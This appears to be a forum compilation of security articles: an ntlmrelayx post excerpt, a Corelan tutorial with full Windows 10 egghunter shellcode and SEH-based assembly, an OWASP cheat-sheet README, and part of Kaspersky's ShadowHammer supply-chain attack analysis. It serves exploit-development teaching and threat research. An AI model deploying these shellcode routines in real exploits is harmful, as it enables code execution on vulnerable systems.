Hopefully this blog post gives some hints on what the SOCKS support in ntlmrelayx.py is all about. There are many things to test, and surely a lot of bugs to solve (there are known stability issues). But more importantly, there are still many protocols supporting NTLM that haven't been fully explored! I'd love to get your feedback and, as always, pull requests are welcome. If you have questions or comments, feel free to reach out to me at @agsolino.

Acknowledgments

Dirk-Jan Mollema (@_dirkjan) for his awesome initial work on ntlmrelayx.py and all the modules and plugins contributed over time.
Martin Gallo (@MartinGalloAr) for peer reviewing this blog post.

Sursa: https://www.secureauth.com/blog/playing-relayed-credentials
Windows 10 egghunter (wow64) and more

Published April 23, 2019 | By Peter Van Eeckhoutte (corelanc0d3r)

Introduction

Ok, I have a confession to make: I have always been somewhat intrigued by egghunters. That doesn't mean that I like to use (or abuse) an egghunter just because I fancy what it does. In fact, I believe it's good practice to avoid egghunters if you can, as they tend to slow things down. What I mean is that I have been fascinated by techniques to search memory without making the process crash. It's just a personal thing; it doesn't matter too much. What really matters is that Corelan Team is back. Well, I'm back. This is my first (technical) post in nearly 3 years, and the first post since Corelan Team kind of "faded out" before that. (In fact, I'm curious to see if (some of) the original Corelan Team members will be able to find spare time again to join forces and start doing/publishing some research. I certainly hope so, but let's see what happens.) As some of you already know, I have recently left my day job. (Long story, too long for this post. Glad to share details over a drink.) I have launched a new company called "Corelan Consulting" and I'm trying to make a living through exploit development training and cybersecurity consulting. Trainings are going well, with 2019 almost completely filled up, and classes already being planned for 2020. You can find the training schedules here. If you're interested in setting up the Corelan Bootcamp or Corelan Advanced class in your company or at a conference, read the testimonials first and then contact me. I still need to work on my sales skills in relation to locking in consulting gigs, but I'm sure things will work out fine in the end.
(Yes, please contact me if you'd like me to work with you; I'm available for part-time governance/risk management & assessment work.) Anyway, while building the 2019 edition of the Corelan Bootcamp and updating the materials for Windows 10, I realised that the wow64 egghunter for Windows 7, written by Lincoln, no longer works on Windows 10. In fact, I kind of expected it to fail, as we already knew that Microsoft keeps changing the syscall numbers with every major Windows release. And since the most commonly used egghunter mechanism is based on the use of a system call, it's clear that changing the number will break the egghunter. By the way: the system calls (and their numbers) are documented here: https://j00ru.vexillium.org/syscalls/nt/64/ (Thanks Mateusz "j00ru" Jurczyk). You can find the evolution of the "NtAccessCheckAndAuditAlarm" system call number in the table on the aforementioned website. Anyway, changing a system call number doesn't really sound all too exciting or difficult, but it also became clear that the arguments & stack layout and the behavior of the system call in Windows 10 differ from the Windows 7 version. We found some Win10 egghunter PoCs flying around, but discovered that they did not work reliably in real exploits. Lincoln looked at it for a few moments, did some debugging and produced a working version for Windows 10. So, that means we're quite proud to be able to announce a working (wow64) egghunter for Windows 10. The version below has been tested in real exploits and targets.

wow64 egghunter for Windows 10

As explained, the challenge was to figure out where & how the new system call expects its arguments, and how it changes registers & the stack, to make sure that the arguments are always in the right place and the intended functionality is provided: to test whether a given page is accessible or not, and to do so without making the process die.
This is what the updated routine looks like:

"\x33\xD2"              #XOR EDX,EDX
"\x66\x81\xCA\xFF\x0F"  #OR DX,0FFF
"\x33\xDB"              #XOR EBX,EBX
"\x42"                  #INC EDX
"\x52"                  #PUSH EDX
"\x53"                  #PUSH EBX
"\x53"                  #PUSH EBX
"\x53"                  #PUSH EBX
"\x53"                  #PUSH EBX
"\x6A\x29"              #PUSH 29 (system call 0x29)
"\x58"                  #POP EAX
"\xB3\xC0"              #MOV BL,0C0
"\x64\xFF\x13"          #CALL DWORD PTR FS:[EBX] (perform the system call)
"\x83\xC4\x10"          #ADD ESP,0x10
"\x5A"                  #POP EDX
"\x3C\x05"              #CMP AL,5
"\x74\xE3"              #JE SHORT
"\xB8\x77\x30\x30\x74"  #MOV EAX,74303077
"\x8B\xFA"              #MOV EDI,EDX
"\xAF"                  #SCAS DWORD PTR ES:[EDI]
"\x75\xDE"              #JNZ SHORT
"\xAF"                  #SCAS DWORD PTR ES:[EDI]
"\x75\xDB"              #JNZ SHORT
"\xFF\xE7"              #JMP EDI

This egghunter works great on Windows 10, but it assumes you're running inside the wow64 environment (32-bit process on 64-bit OS). Of course, as Lincoln has explained in his blog post, you can simply add a check to determine the architecture and make the egghunter work on a native 32-bit OS as well. You can generate this egghunter with mona.py too - simply run:

!mona egg -wow64 -winver 10

When debugging this egghunter (or any wow64 egghunter that uses system calls), you'll notice access violations during the execution of the system call. These access violations can be safely passed through and will be handled by the OS... but the debugger will break every time it sees an access violation. (In essence, the debugger will break as soon as the code attempts to test a page that is not readable. In other words, you'll get an awful lot of access violations, requiring your manual intervention.) If you're using Immunity Debugger, you can simply tell the debugger to ignore the access violations. To do so, click on 'debugging options', and open the 'exceptions' tab.
Add the following hex values under "Add range":

0xC0000005 - ACCESS VIOLATION
0x80000001 - STATUS_GUARD_PAGE_VIOLATION

Of course, when you have finished debugging the egghunter, don't forget to remove these 2 exceptions again.

Going forward

For sure, MS is entitled to change whatever they want in their operating system. I don't think developers are supposed to issue system calls themselves; I believe they should be using the wrapper functions in ntdll.dll instead. In other words, it should be "safe" for MS to change system call numbers. I don't know what is behind the system call number increment with every Windows version, and I don't know if the system call numbers are going to remain the same forever, as Windows 10 has been labeled the "last Windows version". From an egghunter perspective that would be great. As an increasingly larger group of people adopts Windows 10, the egghunter will have an increasingly larger success ratio as well. But in reality I don't know if that is a valid assumption to make or not. In any case, it made me think: Would there be a way to make an egghunter work using a different technique, without the use of system calls? And if so, would that technique also work on older versions of Windows? And if we're not using system calls, would it work on native x86 and wow64 environments right away? Let's see.

Exception Handling

The original paper on egghunters ("Safely Searching Process Virtual Address Space"), written by skape (2004!), already introduced the use of custom exception handlers to handle the access violation that occurs when you try to read from a page that is not accessible. By making the handler point back into the egghunter, the egghunter would be able to move on. The original implementation, unfortunately, no longer seems to work.
While doing some testing (many years ago, as well as just recently on Windows 10), it looks like the OS doesn't really allow you to make the exception handler point directly to the stack (I haven't tried the heap, but I expect the same restriction to be in place). In other words, if the egghunter runs from the stack or heap, you wouldn't be able to make the egghunter use itself as the exception handler and move on. Before looking at a possible solution, let's remind ourselves of how the exception handling mechanism works. When the OS sees an exception and decides to pass it to the corresponding thread in the process, it will instruct a function in ntdll.dll to launch the exception handling mechanism within that thread. This routine will check the TEB at offset 0 (accessible via FS:[0]) and retrieve the address of the topmost record in the exception handling chain on the stack. Each record consists of 2 fields:

struct EXCEPTION_REGISTRATION
{
    EXCEPTION_REGISTRATION *nextrecord; // pointer to next record (nseh)
    DWORD handler;                      // pointer to handler function
};

The topmost record contains the address of the routine that will be called first to check whether the application can handle the exception or not. If that routine fails, the next record in the chain will be tried (either until one of the routines is able to handle the exception, or until the default handler is used, sending the process to heaven). So, in other words, the routine in ntdll.dll will find the record and call the "handler" address (i.e. whatever is placed in the second field of the record). Translating this into the egghunter world: if we want to maintain control over what happens when an exception occurs, we'll have to create a custom "topmost" SEH record, making sure it is the topmost record at all times during the execution of the egghunter, and we'll have to make the record's handler point to a routine that allows our egghunter to continue running and move on with the next page.
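To make the record layout concrete: in a 32-bit process, each SEH chain entry is exactly two 32-bit fields (8 bytes) sitting on the stack. A small Python ctypes sketch can model that layout (this is just an illustration of the structure's shape, not code that installs a handler):

```python
import ctypes

class EXCEPTION_REGISTRATION(ctypes.Structure):
    """Model of one SEH chain record: two 32-bit fields on the stack."""
    _fields_ = [
        ("nextrecord", ctypes.c_uint32),  # pointer to next record (nseh)
        ("handler",    ctypes.c_uint32),  # pointer to handler function
    ]

# Each record occupies exactly 8 bytes in a 32-bit process
print(ctypes.sizeof(EXCEPTION_REGISTRATION))  # 8
```

Note that `c_uint32` is used instead of real pointer types so the sketch keeps the 32-bit layout even when run on a 64-bit Python.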
Again, if our "custom" record is the topmost record, we can be sure that it will be the first one to be used. Of course, we should be careful and take the consequences and effects of running the exception handling mechanism into account: the exception handling mechanism will change the value of ESP. The functionality will create an "exception dispatcher stack" frame at the new ESP location, with a pointer to the originating SEH frame at ESP+8. We'll have to "undo" this change to ESP to make sure it points back to the area on the stack where the egghunter is storing its data. Next, we should also avoid creating new records all the time. Instead, we should try to reuse the same record over and over again, avoiding pushing data to the stack all the time and thus avoiding running out of stack space. Additionally, of course, the egghunter needs to be able to run from any location in memory. Finally, whatever we put as the "SE Handler" (second field of the record) has to be SafeSEH compatible. Unfortunately, that is the weak spot of my "solution". Additionally, my routine won't work if SEHOP is active (but that's not active by default on client systems, IIRC). Creating our own custom SEH record means that we're going to be writing something to the stack, overwriting/damaging what is already there. So, if your egghunter/shellcode is also on the stack around that location, you may want to adjust ESP before running the egghunter.
Just sayin'. This is what my SEH based egghunter looks like (ready to compile with nasm):

; Universal SEH based egg hunter (x86 and wow64)
; tested on Windows 7 & Windows 10
; written by Peter Van Eeckhoutte (corelanc0d3r)
; www.corelan.be - www.corelan-training.com - www.corelan-consulting.com
;
; warning: will damage stack around ESP
;
; usage: find a non-safeseh protected pointer to pop/pop/ret and put it in the placeholder below
;
[BITS 32]

CALL $+4                 ; getPC routine
RET
POP ECX
ADD ECX,0x1d             ; offset to "handle" routine
;set up SEH record
XOR EBX,EBX
PUSH ECX                 ; remember where our 'custom' SE Handler routine will be
PUSH ECX                 ; p/p/r will fly over this one
PUSH 0x90c3585c          ; trigger p/p/r again :)
PUSH 0x44444444          ; Replace with P/P/R address ** PLACEHOLDER **
PUSH 0x04EB5858          ; SHORT JUMP
MOV DWORD [FS:EBX],ESP   ; put our SEH record to top of chain
JMP nextpage

handle:                  ; our custom handle
SUB ESP,0x14             ; undo changes to ESP
XOR EBX,EBX
MOV DWORD [FS:EBX],ESP   ; make our SEH record topmost again
MOV EDX, [ESP-4]         ; pick up saved EDX
INC EDX

nextpage:
OR DX, 0x0FFF
INC EDX
MOV [ESP-4], EDX         ; remember where we are searching
MOV EAX, 0x74303077      ; w00t
MOV EDI, EDX
SCASD
JNZ nextpage+5
SCASD
JNZ nextpage+5
JMP EDI

Let's look at the various components of the egghunter. First, the hunter starts with a "GetPC" routine (designed to find its own absolute address in memory), followed by an instruction that adds 0x1d bytes to the address retrieved by that GetPC routine. After adding this offset, ECX will contain the absolute address of where the actual "handler" routine will be in memory (referenced by the label "handle" in the code above). Keep in mind that the egghunter needs to be able to dynamically determine this location at runtime, because the egghunter will use the exception handling mechanism to come back to itself and continue running the egghunter.
That means we'll need to determine where it is and store the reference on the stack, so we can retrieve it and jump to it later, during the exception handling mechanism. Next, the code creates a new custom SEH record. Although a SEH record only takes 2 fields, the code is actually pushing 5 specially crafted values onto the stack. Only the last 2 of them will become the SEH record; the other ones are used to allow the exception handler to restore ESP and continue execution of the egghunter. Let's look at what gets pushed and why:

PUSH ECX: this is the address where the "handle" routine is in memory, as determined by the GetPC routine earlier. The exception handler will eventually need to return to this one.
PUSH ECX: we're pushing the address again, but this one won't be used. We'll be using the pop/pop/ret pointer twice. The first time, it will be used by the exception handler to bring execution back to our code; the second time, it will be used to return to the "ECX" stored on the stack. This second ECX is just there to compensate for the second POP in the p/p/r. You can push anything you like on the stack.
PUSH 0x90c3585C: this code will get executed. It's a POP ESP, POP EAX, RET. This will reset the stack back to the original location on the stack where we have stored the SEH record. The RET will transfer execution back to the p/p/r pointer on the stack (part of the SEH record). In other words, the p/p/r pointer will be used twice. The second time, it will eventually return to the address of ECX that was stored on the stack (see the previous PUSH ECX instructions).

Next, the real SEH record is created by pushing 2 more values onto the stack:

Pointer to P/P/R (must be a non-SafeSEH protected pointer). We have to use a p/p/r because we can't make this handler field point directly into the stack (or heap). As we can't just make the exception mechanism go back directly to our code, we'll use the pop/pop/ret to maintain control over the execution flow.
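As a quick sanity check on that 0x1d offset and the egg tag, here is a short Python sketch over the assembled opcodes of this egghunter (with the p/p/r placeholder left as \x44\x44\x44\x44). The CALL pushes the address of the byte right after itself (offset 5), POP ECX retrieves it, and adding 0x1d lands on offset 0x22, which is exactly where the SUB ESP,0x14 of the "handle" routine sits:

```python
# Assembled SEH egghunter bytes (p/p/r placeholder: \x44\x44\x44\x44)
egghunter = (b"\xe8\xff\xff\xff\xff\xc3\x59\x83"
             b"\xc1\x1d\x31\xdb\x51\x51\x68\x5c"
             b"\x58\xc3\x90\x68\x44\x44\x44\x44"
             b"\x68\x58\x58\xeb\x04\x64\x89\x23"
             b"\xeb\x0d\x83\xec\x14\x31\xdb\x64"
             b"\x89\x23\x8b\x54\x24\xfc\x42\x66"
             b"\x81\xca\xff\x0f\x42\x89\x54\x24"
             b"\xfc\xb8\x77\x30\x30\x74\x89\xd7"
             b"\xaf\x75\xf1\xaf\x75\xee\xff\xe7")

getpc = 5                # CALL pushes the address of offset 5; POP ECX picks it up
handle = getpc + 0x1d    # ADD ECX,0x1d -> offset 0x22

# offset 0x22 holds SUB ESP,0x14 (83 EC 14), the start of "handle"
print(hex(handle), egghunter[handle:handle + 3].hex())

# the immediate of MOV EAX,0x74303077 is the tag "w00t" in little endian
print(egghunter[58:62])  # b'w00t'
```

This kind of check is handy whenever you tweak the hunter: if you add or remove bytes before the "handle" label, the 0x1d offset must be adjusted accordingly.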
In the code above, you'll have to replace the 0x44444444 value with the address of a non-SafeSEH protected pop/pop/ret. Then, when an exception occurs (i.e. when the egghunter reaches a page that is not accessible), the pop/pop/ret will get triggered for the first time, returning to the 4 bytes in the first field of the SEH record. In the first field of the SEH record, I have placed 2 pops and a short-jump-forward sequence. This will adjust the stack slightly, so the pointer to the SEH record ends up at the top of the stack. Next, it will jump to the instruction sequence that was pushed onto the stack earlier (0x90C3585C). As explained, that sequence will trigger the POP/POP/RET again, which will eventually return to the stored ECX pointer (which is where the egghunter is). To complete the creation of the SEH record and mark it as the topmost record, we simply write its location into the TEB. As our new custom SEH record currently sits at ESP, we can simply write the value of ESP into the TEB at offset 0 (MOV DWORD [FS:EBX],ESP). (That's why we cleared EBX in the first place.) At this point, the egghunter is ready to test whether a page is readable. The code uses EDX as the reference of where to read from. The routine starts by going to the end of the page (OR DX, 0x0FFF), then moves to the start of the next page (INC EDX), and then stores the value of EDX on the stack (at [ESP-4]), so the exception handler can pick it up later. If the read attempt (SCASD) fails, an access violation will be triggered. The access violation will use our custom SEH record (as it is supposed to be the topmost record), and that routine is designed to resume execution of the egghunter (by running the "handle" routine, which will eventually restore the EDX pointer from the stack and move on to the next page). The "handle" routine will:

Adjust the stack again, correcting its position to put it where it is/should be when running the egghunter.
(SUB ESP,0x14). Next, it will make sure our custom record is the topmost SEH record again (just anticipating the case where some other code has added a new topmost record). Finally, it will pick up the reference from the stack (where we stored the last address we've tried to access) and move on (with the next page). If a page is readable, the egghunter will check for the presence of the tag, twice. If the tags are found, the final "JMP EDI" will tell the CPU to run the code placed right after the double tag. When debugging the egghunter, you'll notice that it throws access violations (when the code tries to access a page that is not accessible). Of course, in this case, these access violations are absolutely normal, but you'll still have to pass the exceptions back to the application (Shift F9). You can also configure Immunity Debugger to ignore (and pass) the exceptions automatically, by configuring the Exceptions. To do so, click on 'debugging options', and open the 'exceptions' tab. Add the following hex values under "Add range":
0xC0000005 – ACCESS VIOLATION
0x80000001 – STATUS_GUARD_PAGE_VIOLATION
Of course, when you have finished debugging the egghunter, don't forget to remove these 2 exceptions again. In order to use the egghunter, you'll need to convert the asm instructions into opcode first. To do so, you'll need to install nasm. (I have used the Win32 installer from https://www.nasm.us/pub/nasm/releasebuilds/2.14.02/win32/) Save the asm code snippet above into a text file (for instance "c:\dev\win10_egghunter_seh.nasm").
Next, run “nasm” to convert it into a binary file that contains the opcode: "C:\Program Files (x86)\NASM\nasm.exe" -o c:\dev\win10_egghunter_seh.obj c:\dev\win10_egghunter_seh.nasm Next, dump the contents of the binary file to a hex format that you can use in your scripts and exploits: python c:\dev\bin2hex.py c:\dev\win10_egghunter_seh.obj (You can find a copy of the bin2hex.py script in Corelan’s github repository) If all goes well, this is what you’ll get: "\xe8\xff\xff\xff\xff\xc3\x59\x83" "\xc1\x1d\x31\xdb\x51\x51\x68\x5c" "\x58\xc3\x90\x68\x44\x44\x44\x44" "\x68\x58\x58\xeb\x04\x64\x89\x23" "\xeb\x0d\x83\xec\x14\x31\xdb\x64" "\x89\x23\x8b\x54\x24\xfc\x42\x66" "\x81\xca\xff\x0f\x42\x89\x54\x24" "\xfc\xb8\x77\x30\x30\x74\x89\xd7" "\xaf\x75\xf1\xaf\x75\xee\xff\xe7" Again, don’t forget to replace the \x44\x44\x44\x44 (end of third line) with the address of a pop/pop/ret (and to store the address in little endian, if you are editing the bytes ) Python friendly copy/paste code: egghunter = ("\xe8\xff\xff\xff\xff\xc3\x59\x83" "\xc1\x1d\x31\xdb\x51\x51\x68\x5c" "\x58\xc3\x90\x68") egghunter += "\x??\x??\x??\x??" #replace with pointer to pop/pop/ret. Use !mona seh egghunter += ("\x68\x58\x58\xeb\x04\x64\x89\x23" "\xeb\x0d\x83\xec\x14\x31\xdb\x64" "\x89\x23\x8b\x54\x24\xfc\x42\x66" "\x81\xca\xff\x0f\x42\x89\x54\x24" "\xfc\xb8\x77\x30\x30\x74\x89\xd7" "\xaf\x75\xf1\xaf\x75\xee\xff\xe7") I have not added the routine to mona.py yet (but I will, eventually, at some point). Of course, if you see room for improvement, and/or able to reduce the size of the egghunter, please don’t hesitate to let me know. (I’ll be waiting for your feedback for a while before adding it to mona). Of course I’d love to hear if the egghunter works for you, and if it works across Windows versions and architectures (32bit systems, older Windows versions, etc). That’s all folks Thanks for reading! 
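One last aside before wrapping up: wiring the dumped bytes into an exploit buffer typically looks like the sketch below. The pop/pop/ret address and the shellcode are placeholders, not values from this article:

```python
# Assembling the egghunter and the egg'd payload. All addresses and the
# payload below are placeholders for illustration only.
import struct

egghunter  = (b"\xe8\xff\xff\xff\xff\xc3\x59\x83"
              b"\xc1\x1d\x31\xdb\x51\x51\x68\x5c"
              b"\x58\xc3\x90\x68")
# Placeholder pointer; find a real non-SafeSEH pop/pop/ret with !mona seh.
egghunter += struct.pack("<I", 0x44444444)      # packed little-endian for you
egghunter += (b"\x68\x58\x58\xeb\x04\x64\x89\x23"
              b"\xeb\x0d\x83\xec\x14\x31\xdb\x64"
              b"\x89\x23\x8b\x54\x24\xfc\x42\x66"
              b"\x81\xca\xff\x0f\x42\x89\x54\x24"
              b"\xfc\xb8\x77\x30\x30\x74\x89\xd7"
              b"\xaf\x75\xf1\xaf\x75\xee\xff\xe7")

# Somewhere else in the process: the doubled tag, then the real shellcode.
# The final JMP EDI lands right after the second tag.
shellcode = b"\xcc" * 32                        # placeholder payload
egg = b"w00t" * 2 + shellcode
```

Using struct.pack for the pointer avoids having to reverse the bytes by hand when swapping in the real pop/pop/ret address.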
I hope you have enjoyed this brand new article and I hope you're as excited about the future as I am. If you would like to hang out, discuss infosec topics, and ask (and answer) questions, please sign up to our Slack workspace. To access the workspace: Head over to https://www.facebook.com/corelanconsulting (and like the page while you're at it). You don't need a facebook account, the page is public. Scroll through the posts and look for the one that contains the invite link to Slack. Register, done. Also, feel free to follow us on Twitter (@corelanconsult) to stay informed about new articles and blog posts. Corelan Training & Corelan Consulting This article is just a small example of what you'll learn in our Corelan Bootcamp. If you'd like to take one of our Corelan classes, check our schedules at https://www.corelan-training.com/index.php/training-schedules. If you prefer to set up a class at your company or conference, don't hesitate to contact me via this form. As explained at the start of the article: the trainings and consulting gigs are now my main source of income. I am only able to do research and publish information for free if I can make a living as well. This website is supported, hosted and funded by Corelan Consulting. The more classes I can teach and the more consulting I can do, the more time I can invest in research and the publication of tutorials. Thanks! © 2019, Peter Van Eeckhoutte (corelanc0d3r). All rights reserved. Sursa: https://www.corelan.be/index.php/2019/04/23/windows-10-egghunter/
Welcome to OWASP Cheat Sheet Series V2 This repository contains all the cheat sheets of the project and represents the V2 of the OWASP Cheat Sheet Series project. Table of Contents Cheat Sheets index Special thanks Editor & validation policy Conversion rules How to setup my contributor environment? How to contribute? Offline website Project leaders Core technical review team PR usage for core committers Project logo Folders License Code of conduct Cheat Sheets index The following indexes are provided: This index references all released cheat sheets sorted alphabetically. This index is automatically generated by this script. This index references all released cheat sheets using the OWASP ASVS project as reading source. This index is manually managed in order to allow contributions along with custom content. This index references all released cheat sheets using the OWASP Proactive Controls project as reading source. This index is manually managed in order to allow contributions along with custom content. You can also search this repository using keywords via this URL: https://github.com/OWASP/CheatSheetSeries/search?q=[KEYWORDS] Example: https://github.com/OWASP/CheatSheetSeries/search?q=csrf More information about the GitHub search feature can be found here. Project leaders Dominique Righetto. Jim Manico. Core technical review team Any GitHub member is free to add a comment on any Proposal (issue) or PR. However, we have created an official core technical review team (core committers) in order to: Review all PRs/Proposals in a consistent and regular way using GitHub's review feature. Extend the range of technologies known by the review team. Allow several technical opinions on a Proposal/PR; all exchanges are public because we use the GitHub comment feature. Decisions of the core technical review team carry the same weight as those of the project leaders, so if a reviewer rejects a PR (the rejection must be technically documented and explained), then the project leaders will apply that decision.
Members: Elie Saad. Jakub Maćkowski. Dominique Righetto. Jim Manico. PR usage for core committers For the following kinds of modification, the PR system will be used by the core committers in order to allow peer review using the GitHub PR review system: Adding a new cheat sheet. Deep modification of an existing cheat sheet. This is the procedure: Clone the project. Switch to the master branch: git checkout master Create a branch named feature_request_[ID] where [ID] is the number of the linked issue opened prior to the PR to follow the contribution process: git checkout -b feature_request_[ID] Switch to this new branch (normally this is already the case): git checkout feature_request_[ID] Do the expected work. Push the new branch: git push origin feature_request_[ID] When the work is ready for review, create a pull request by visiting this link: https://github.com/OWASP/CheatSheetSeries/pull/new/feature_request_[ID] Implement the modifications requested by the reviewers; when the core technical review team is OK with the result, the PR is merged. Once merged, delete the branch using this GitHub feature. See project current branches. Project logo Project's official logo files are hosted here. Folders cheatsheets_excluded: Contains the cheat sheet markdown files converted with PANDOC, for which a discussion must be held in order to decide whether to include them in the V2 of the project, because the content has not been updated in a long time or is no longer relevant. See this discussion. cheatsheets: Contains the final cheat sheet files. Any .md file present in this folder is considered released. assets: Contains the assets used by the cheat sheets (images, pdf, zip...). The naming convention is [CHEAT_SHEET_MARKDOWN_FILE_NAME]_[IDENTIFIER].[EXTENSION] Use PNG format for the images. scripts: Contains all the utility scripts used to operate the project (markdown linter audit, dead link identification...).
templates: Contains templates used for different kinds of files (cheatsheet...). .github: Contains materials used to configure different behaviors of GitHub. .circleci / .travis.yml (file): Contains the definition of the integration jobs used to control the integrity and consistency of the whole project: TravisCI is used to perform compliance check actions at each Push/Pull Request. It must remain as fast as possible (currently under 2 minutes) in order to provide rapid compliance feedback on the Push/Pull Request. CircleCI is used to perform longer operations such as build, publish and deploy actions. Offline website Unfortunately, PDF generation is not possible because the content is cut off in some cheat sheets, for example the abuse case one. However, to make it possible to consult the whole collection of cheat sheets in fully offline mode, a script has been created to generate an offline site using GitBook. The script is here. book.json: GitBook configuration file. Preface.md: Project preface description applied to the generated site. Automated build This link allows you to download a build (zip archive) of the offline website. Manual build Use the commands below to generate the site: # Your python version must be >= 3.5 $ python --version Python 3.5.3 # Dependencies: # sudo apt install -y nodejs # sudo npm install gitbook-cli -g $ cd scripts $ bash Generate_Site.sh Generate a offline portable website with all the cheat sheets... Step 1/5: Init work folder. Step 2/5: Generate the summary markdown page. Index updated. Summary markdown page generated. Step 3/5: Create the expected GitBook folder structure. Step 4/5: Generate the site. info: found 45 pages info: found 86 asset files info: >> generation finished with success in 14.2s ! Step 5/5: Cleanup.
Generation finished to the folder: ../generated/site $ cd ../generated/site/ $ ls -l drwxr-xr-x 1 Feb 3 11:05 assets drwxr-xr-x 1 Feb 3 11:05 cheatsheets drwxr-xr-x 1 Feb 3 11:05 gitbook -rw-r--r-- 1 Feb 3 11:05 index.html -rw-r--r-- 1 Feb 3 11:05 search_index.json Conversion rules Use the markdown syntax described in this guide. Use this sheet for Superscript and Subscript characters. Use this sheet for Arrows (left, right, top, down) characters. Store all assets in the assets folder and use the following syntax: ![ALTERNATE_NAME](../assets/ASSET_NAME.EXT) for the insertion of an image. Use PNG format for the images (this software can be used to handle format conversion). [ALTERNATE_NAME](../assets/ASSET_NAME.EXT) for the insertion of other kinds of media (pdf, zip...). Use ATX style (# syntax) for section heads. Use **bold** syntax for bold text. Use *italic* syntax for italic text. Use TAB for nested lists and not spaces. Use code fencing syntax along with syntax highlighting for code snippets (avoid horizontal scrollbars where possible). If you use the {{ or }} pattern in code fencing, then add a space between the two curly braces (ex: { {), otherwise it breaks the GitBook generation process. The same remark applies to the cheat sheet file name: only the following syntax is allowed: [a-zA-Z_]+. No HTML code is allowed, only markdown syntax! Use this site for the generation of tables. Use a single new line between a section head and the beginning of its content. Editor & validation policy Visual Studio Code is used for the work on the markdown files. It is also used for the work on the scripts. The file Project.code-workspace is the workspace file used to open the project in VSCode. The following plugin is used to validate the markdown content. The file .markdownlint.json defines the central validation policy applied at VSCode (IDE) and TravisCI (CI) levels. Details about the rules are here.
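As an aside, the [a-zA-Z_]+ file-name rule from the conversion rules above is easy to check mechanically. A minimal illustration (this is not part of the project's actual tooling):

```python
# Hypothetical helper: validate a cheat sheet file name against the
# [a-zA-Z_]+ rule from the conversion rules (letters and underscores only).
import re

def is_valid_sheet_name(filename):
    """True if the markdown file name uses only ASCII letters and underscores."""
    return re.fullmatch(r"[a-zA-Z_]+\.md", filename) is not None

print(is_valid_sheet_name("Abuse_Case_Cheat_Sheet.md"))   # True
print(is_valid_sheet_name("csrf-prevention.md"))          # False (hyphen)
```

A check like this could run in CI alongside the markdownlint policy, but again, the script above is only a sketch.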
The file .markdownlinkcheck.json defines the configuration used, at TravisCI level, to validate all web and relative links used in the cheat sheets with this tool. How to setup my contributor environment? See here. How to contribute? See here. Special thanks A special thank you to the following people for the help provided during the migration: ThunderSon: extensive help with updating the OWASP wiki links for all the migrated cheat sheets. mackowski: extensive help with updating the OWASP wiki links for all the migrated cheat sheets. License See here. Sursa: https://github.com/OWASP/CheatSheetSeries
Operation ShadowHammer: a high-profile supply chain attack By GReAT, AMR on April 23, 2019. 10:00 am In late March 2019, we briefly highlighted our research on ShadowHammer attacks, a sophisticated supply chain attack involving ASUS Live Update Utility, which was featured in a Kim Zetter article on Motherboard. The topic was also one of the research announcements made at the SAS conference, which took place in Singapore on April 9-10, 2019. Now it is time to share more details about the research with our readers. At the end of January 2019, Kaspersky Lab researchers discovered what appeared to be a new attack on a large manufacturer in Asia. Our researchers named it “Operation ShadowHammer”. Some of the executable files, which were downloaded from the official domain of a reputable and trusted large manufacturer, contained apparent malware features. Careful analysis confirmed that the binary had been tampered with by malicious attackers. It is important to note that any, even tiny, tampering with executables in such a case normally breaks the digital signature. However, in this case, the digital signature was intact: valid and verifiable. We quickly realized that we were dealing with a case of a compromised digital signature. We believe this to be the result of a sophisticated supply chain attack, which matches or even surpasses the ShadowPad and the CCleaner incidents in complexity and techniques. The reason that it stayed undetected for so long is partly the fact that the trojanized software was signed with legitimate certificates (e.g. “ASUSTeK Computer Inc.”). The goal of the attack was to surgically target an unknown pool of users, who were identified by their network adapters’ MAC addresses. To achieve this, the attackers had hardcoded a list of MAC addresses into the trojanized samples and the list was used to identify the intended targets of this massive operation. 
We were able to extract more than 600 unique MAC addresses from more than 200 samples used in the attack. There might be other samples out there with different MAC addresses on their lists, though. Technical details The research started upon the discovery of a trojanized ASUS Live Updater file (setup.exe), which contained a digital signature of ASUSTeK Computer Inc. and had been backdoored using one of the two techniques explained below. In earlier variants of ASUS Live Updater (i.e. MD5:0f49621b06f2cdaac8850c6e9581a594), the attackers replaced the WinMain function in the binary with their own. This function copies a backdoor executable from the resource section using a hardcoded size and offset to the resource. Once copied to the heap memory, another hardcoded offset, specific to the executable, is used to start the backdoor. The offset points to a position-independent shellcode-style function that unwraps and runs the malicious code further. Some of the older samples revealed the project path via a PDB file reference: “D:\C++\AsusShellCode\Release\AsusShellCode.pdb“. This suggests that the attackers had exclusively prepared the malicious payload for their target. A similar tactic of precise targeting has become a persistent property of these attackers. A look at the resource section used for carrying the malicious payload revealed that the attackers had decided not to change the file size of the ASUS Live Updater binary. They changed the resource contents and overwrote a tiny block of the code in the subject executable. The layout of that patched file is shown below. We managed to find the original ASUS Live Updater executable which had been patched and abused by the attackers. As a result, we were able to recover the overwritten data in the resource section. The file we found was digitally signed and certainly had no infection present. Both the legitimate ASUS executable and the resource-embedded updater binary contain timestamps from March 2015. 
Considering that the operation took place in 2018, this raises the following question: why did the attackers choose an old ASUS binary as the infection carrier? Another injection technique was found in more recent samples. Using that technique, the attackers patched the code inside the C runtime (CRT) library function “___crtExitProcess”. The malicious code executes a shellcode loader instead of the standard function “___crtCorExitProcess”: This way, the execution flow is passed to another address which is located at the end of the code section. The attackers used a small decryption routine that can fit into a block at the end of the code section, which has a series of zero bytes in the original executable. They used the same source executable file from ASUS (compiled in March 2015) for this new type of injection. The loader code copies another block of encrypted shellcode from the file’s resource section (of the type “EXE”) to a newly allocated memory block with read-write-execute attributes and decrypts it using a custom block-chaining XOR algorithm, where the first dword is the initial seed and the total size of the shellcode is stored at an offset of +8. We believe that the attackers changed the payload start routine in an attempt to evade detection. Apparently, they switched to a better method of hiding their embedded shellcode at some point between the end of July and September 2018. ShadowHammer downloader The compromised ASUS binaries carried a payload that was a Trojan downloader. Let us take a closer look at one such ShadowHammer downloader extracted from a copy of the ASUS Live Updater tool with MD5:0f49621b06f2cdaac8850c6e9581a594. 
It has the following properties:
MD5: 63f2fe96de336b6097806b22b5ab941a
SHA1: 6f8f43b6643fc36bae2e15025d533a1d53291b8a
SHA256: 1bb53937fa4cba70f61dc53f85e4e25551bc811bf9821fc47d25de1be9fd286a
Digital certificate fingerprint: 0f:f0:67:d8:01:f7:da:ee:ae:84:2e:9f:e5:f6:10:ea
File Size: 1'662'464 bytes
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Link Time: 2018.07.10 05:58:19 (GMT)
